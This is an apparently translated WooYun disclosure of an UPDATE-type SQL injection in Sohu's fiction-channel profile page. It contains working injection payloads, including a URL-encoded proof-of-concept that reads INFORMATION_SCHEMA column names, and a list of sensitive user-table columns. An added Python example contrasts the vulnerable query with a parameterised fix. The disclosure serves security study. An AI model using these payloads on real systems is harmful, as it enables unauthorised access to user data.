SQL Injection in Sohu's Original Fiction Channel Leads to a Database Dump (Mass User Data Leak)

Posted by admin, 2015-05-02 11:19:44
Summary

2014-07-19: Details reported to the vendor; awaiting vendor response
2014-07-21: Vendor has confirmed; details disclosed to the vendor only
2014-07-31: Details disclosed to core white hats and relevant domain experts
2014-08-10: Details disclosed to regular white hats
2014-08-20: Details disclosed to intern white hats
2014-09-02: Details disclosed to the public

Vulnerability Overview (6 followers)

Defect ID: WooYun-2014-69029

Title: SQL Injection in Sohu's Original Fiction Channel Leads to a Database Dump (Mass User Data Leak)

Vendor: Sohu

Author: 爱上电饭锅

Submitted: 2014-07-19 18:33

Published: 2014-09-02 18:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: www.wooyun.org; for questions or assistance please contact

Tags: SQL injection, sensitive data leak, UPDATE-type SQL injection



Vulnerability Details


Brief description:

The personal centre of Sohu's original fiction channel has a SQL injection that allows every table in the database to be read. Looking at this hole and picturing some Sohu engineer working overtime again on Monday, I finally feel at ease. By the way, any chance of a fox plush toy?

Detailed description:

The horizontal privilege-escalation bug I reported a few days ago seems to have been fixed already, so how could I make a Sohu engineer work overtime again on a weekend like this?

To get around the UI validation, I sent requests straight to the server and probed each parameter carefully. In the end the "province" field behaved oddly and looked like it had a SQL injection. First I tried this value:

1',msn='2',qq='3

After the update, MSN and QQ had not changed, but the address had become "1". So the update went through, but why did msn and qq not take effect? Two possibilities: 1. filtered? 2. overwritten?

If it is 1, that's a pity; let's be optimistic and try 2 first, with this value:

1',province='2',qq='3

Go! It worked! The address now shows "2"!
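The two tries above, reproduced as an added example (not part of the original report) against an in-memory SQLite table: the server-side statement, its SET order and the column layout are assumptions modelled on the observed behaviour, not Sohu's real code. The string-built UPDATE is shown beside the parameterised form, which stores the same input as a literal string.

```python
import sqlite3

# Constructed stand-in for the personal-centre profile table; the column
# layout is an assumption, not Sohu's real t_user_base_info schema.
SCHEMA = """
CREATE TABLE t_user_base_info (id INTEGER PRIMARY KEY,
                               province TEXT, msn TEXT, qq TEXT);
INSERT INTO t_user_base_info VALUES (1, 'Beijing', 'old_msn', '10001');
"""

def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def update_profile_vulnerable(conn, user_id, province, msn, qq):
    # String-built UPDATE (assumed shape of the vulnerable server code).
    # SET items are applied left to right, so an injected assignment only
    # "sticks" if no original assignment to the same column follows it:
    # province is assigned first, msn and qq later, which is why the
    # report's first payload looked "filtered" while the second worked.
    sql = ("UPDATE t_user_base_info SET province='%s', msn='%s', qq='%s' "
           "WHERE id=%d" % (province, msn, qq, user_id))
    conn.execute(sql)
    conn.commit()

def update_profile_safe(conn, user_id, province, msn, qq):
    # Parameterised UPDATE: values travel separately from the SQL text, so
    # quotes and commas in the province value never reach the SQL parser.
    conn.execute(
        "UPDATE t_user_base_info SET province=?, msn=?, qq=? WHERE id=?",
        (province, msn, qq, user_id),
    )
    conn.commit()

def profile(conn, user_id=1):
    return conn.execute(
        "SELECT province, msn, qq FROM t_user_base_info WHERE id=?",
        (user_id,)).fetchone()

def submit(update_fn, province_value):
    # Simulates one profile-save request that legitimately sets msn/qq
    # and carries a user-controlled province value.
    conn = new_db()
    update_fn(conn, 1, province_value, "new_msn", "20002")
    return profile(conn)

if __name__ == "__main__":
    for payload in ("1',msn='2',qq='3", "1',province='2',qq='3"):
        print("vulnerable:", payload, "->", submit(update_profile_vulnerable, payload))
        print("safe:      ", payload, "->", submit(update_profile_safe, payload))
```

With the vulnerable function the first payload leaves province as "1" and the second as "2" while msn and qq keep their legitimate values, matching the report; the parameterised function stores the whole payload as the province text.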

Next, something more advanced? INFORMATION_SCHEMA.TABLES? INFORMATION_SCHEMA.COLUMNS?

In the end all 253 tables (system tables included) were laid bare. I also had a look at the user base-info table, which holds a lot of sensitive data, including the Sohu passport, remaining coins and monthly-ticket count.

The captured list of tables:


The columns of t_user_base_info:

amonitor_state, beforeamount, collected_num, collect_num, daka_date, icon_status, id, Integral, jifen, lastpaydate, lastreturntype, level, logdate, login_date, login_num, nickname, nickname_s, passport, passport_s, payamount, remain_coin, status, user_icon, user_type, yuepiao

If I changed one of these, could I read freely in the ocean of knowledge?

But I still prefer plush toys. Any chance of a little fox plush as a small gift?

Proof of vulnerability:

1. Capture the request.

2. Change the province parameter to: 124%27%2Cprovince%3D(SELECT%20SUBSTRING(column_name%2C1%2C15)%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name%20%3D%20%27t_user_base_info%27%20ORDER%20BY%20column_name%20LIMIT%2010%2C1)%2Cmsn%3D%272

3. The address becomes the name of one of the columns in t_user_base_info.


Fix recommendation:

Overtime it is, then.

Copyright: please credit the source when reposting: 爱上电饭锅@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-07-21 10:25

Vendor reply:

Thanks for the support.

Latest status:

None yet




Comments

  1. 2014-07-20 21:25 | pandas (Regular white hat | Rank: 730 Vulnerabilities: 84 | State first-class protected animal)

    This kind of attitude is not advisable.
